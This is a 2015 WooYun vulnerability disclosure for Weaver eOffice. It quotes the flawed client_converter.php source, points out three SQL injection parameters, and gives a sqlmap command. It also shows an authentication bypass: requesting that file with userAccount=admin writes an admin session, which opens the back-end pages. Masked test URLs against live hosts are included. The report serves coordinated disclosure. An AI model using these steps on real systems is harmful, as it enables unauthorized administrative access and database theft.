当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2015-124503

漏洞标题: 泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台

相关厂商: 泛微Eoffice

漏洞作者: Bear baby

提交时间: 2015-07-06 16:59

公开时间: 2015-10-06 15:26

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-09-01: 细节向核心白帽子及相关领域专家公开
2015-09-11: 细节向普通白帽子公开
2015-09-21: 细节向实习白帽子公开
2015-10-06: 细节向公众公开

简要描述:

表示还没收到过有$的洞,来一个试试

详细说明:

漏洞文件:/client_converter.php

代码如下:

code 区域
<?php


/*********************/


/*                   */


/*  Version : 5.1.0  */


/*  Author  : RM     */


/*  Comment : 071223 */


/*                   */


/*********************/





session_start( );


include_once( "inc/conn.php" );


$userAccount = $_REQUEST['userAccount'];


$langID = $_REQUEST['lang'];


$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID;


$getLangFlagResult = exequery( $connection, $getLangFlagSQL );


$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );


$lang = $getLangFlagRow['LANG_AB'];


$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";


$cursor = exequery( $connection, $query );


$ROW = mysql_fetch_array( $cursor );


$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];


$cursor = exequery( $connection, $query );


if ( $ROW1 = mysql_fetch_array( $cursor ) )


{


				$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];


}


$LOGIN_THEME = $ROW['THEME'];


$template = $ROW['TEMPLATE'];


if ( !$template )


{


				$template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";


				$template_rs = exequery( $connection, $template_query );


				if ( $row_tp = mysql_fetch_array( $template_rs ) )


				{


								$template = $row_tp['TEMPLATE_NAME'];


				}


				else


				{


								$template = "8series";


				}


}


if ( $template == "8series" )


{


				$mainUrl = "/general/index8.php";


}


else if ( $template == "7series" )


{


				$mainUrl = "/general/index.php";


}


else


{


				$mainUrl = "index8.php";


}


if ( $LOGIN_THEME == "" )


{


				$LOGIN_THEME = "default";


}


$LOGIN_THEME = $template."/".$LOGIN_THEME;


$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];


$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];


$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];


$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];


$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];


$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];


$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];


$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;


$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;


$_SESSION['LOGIN_LANG_ID'] = $langID;


$_SESSION['LOGIN_LANG'] = $lang;


$targetType = $_REQUEST['target'];


$url = $_REQUEST['goto'];


$funcID = $_REQUEST['funcID'];


if ( $funcID != "" )


{


				$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; ";


				exequery( $connection, $query );


}


if ( $targetType == "blank" )


{


				header( "location:".$url );


}


else


{


				header( "location:".$mainUrl."?goto=".urlencode( $url ) );


}


?>



注入漏洞:

注入存在以下语句

code 区域
$userAccount = $_REQUEST['userAccount'];


$langID = $_REQUEST['lang'];


$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID; //lang直接进入sql



查询

code 区域
$getLangFlagResult = exequery( $connection, $getLangFlagSQL );


$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );


$lang = $getLangFlagRow['LANG_AB'];


$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'"; //userAccount直接进入sql查询


$cursor = exequery( $connection, $query );


$ROW = mysql_fetch_array( $cursor );


……..省略代码……


$funcID = $_REQUEST['funcID'];


if ( $funcID != "" )


{


				$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; "; //funcID直接进入sql查询


				exequery( $connection, $query );


}



上面三处参数都是直接进入sql语句进行查询,导致注入

code 区域
sqlmap.py -u "http://localhost/client_converter.php?userAccount=1&lang=1" --dbms=mysql --dbs



1.png



网上案例测试如下

2.png







绕过登录直接操作后台

问题存在如下代码:

code 区域
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";


$cursor = exequery( $connection, $query );


$ROW = mysql_fetch_array( $cursor );


$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];


$cursor = exequery( $connection, $query );


if ( $ROW1 = mysql_fetch_array( $cursor ) )


{


				$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];


}


……省略代码……


//userAccount参数进入SQL语句,查询UserAccount表,如记录存在 把USER_ID PASSWORD等值赋值到SESSION里面。


$LOGIN_THEME = $template."/".$LOGIN_THEME;


$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];


$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];


$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];


$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];


$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];


$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];


$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];


$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;


$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;


$_SESSION['LOGIN_LANG_ID'] = $langID;


$_SESSION['LOGIN_LANG'] = $lang;





再看后台验证功能的文件,/inc/auth.php。部分代码如下


session_start( );


include_once( "inc/utility.php" );


include_once( "inc/conn.php" );


global $_sess;


if ( !session_is_registered( "LOGIN_USER_ID" ) ) //LOGIN_USER_ID


{


				$url = $_SERVER['PHP_SELF'];


				echo "<script>\r\n\ttop.location.href='/login.php';\r\n\t</script>";


				exit( );


}


$_sess['lang'] = $_SESSION['LOGIN_LANG'];


$_sess['lg_theme'] = $_SESSION['LOGIN_THEME'];


$lang_file = "lang/".$_sess['lang']."/common.lang.php";


include_once( $lang_file );


includelangpak( "other" );


if ( $_SESSION['LOGIN_OA_ISPIRIT'] != "ispirit" )


{


				$sql = "SELECT * FROM SYS_PARA WHERE PARA_NAME = 'LIMIT_LOGIN_TIMES' ";


				$re = exequery( $connection, $sql );


				$row = mysql_fetch_array( $re );


				$lock = $row['PARA_VALUE'];


				if ( $lock == "1" )


				{


								$sid = session_id( );


								$uid = $_SESSION['LOGIN_USER_ID'];


								$sql = "SELECT SESSION_ID FROM user_online WHERE USER_ID='".$uid."'";


								$re = exequery( $connection, $sql );


								$row = mysql_fetch_array( $re );


								$row['SESSION_ID'];



该文件通过判断session里面的值进行用户验证。

利用方法:

先构造一个用户 如admin。访问client_converter.php?userAccount=用户名&lang=cn

3.png



出现报错,没关系,接下来直接访问后台主页 general/index8.php。可以访问了。

4.png



再访问个 用户管理页面general/system/user/userlist.php。

5.png



漏洞证明:

网上测试案例:

**.**.**.**:8082/client_converter.php?userAccount=admin&lang=cn

**.**.**.**:8082/general/system/user/userlist.php

7.png



8.png



官网

http://**.**.**.**:8028/client_converter.php?userAccount=admin&lang=cn

http://**.**.**.**:8028/general/system/user/userlist.php

10.png



11.png

修复方案:

严格过滤参数,加强安全意识。

版权声明:转载请注明来源 Bear baby@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-08 15:24

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-07-04 17:12 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    你的很多都有$啊

    1# 回复此人
  2. 2015-07-04 17:26 | 茜茜公主 ( 普通白帽子 | Rank:2407 漏洞数:413 | 家里二宝出生,这几个月忙着把屎把尿...忒...)
    0

    好浮夸 表示还没收到过有$的洞,来一个试试

    2# 回复此人
  3. 2015-07-04 18:27 | Bear baby ( 普通白帽子 | Rank:238 漏洞数:28 | 总感觉我会在哪天突然顿悟。)
    0

    @xsser 额,是要再等等才会显示$符号是么。。

    3# 回复此人
  4. 2015-07-04 18:28 | Bear baby ( 普通白帽子 | Rank:238 漏洞数:28 | 总感觉我会在哪天突然顿悟。)
    0

    @茜茜公主 我的错。。

    4# 回复此人
  5. 2015-10-06 16:52 | 白无常 ( 实习白帽子 | Rank:92 漏洞数:11 )
    0

    然而并没有$

    5# 回复此人

登录后才能发表评论,请先 登录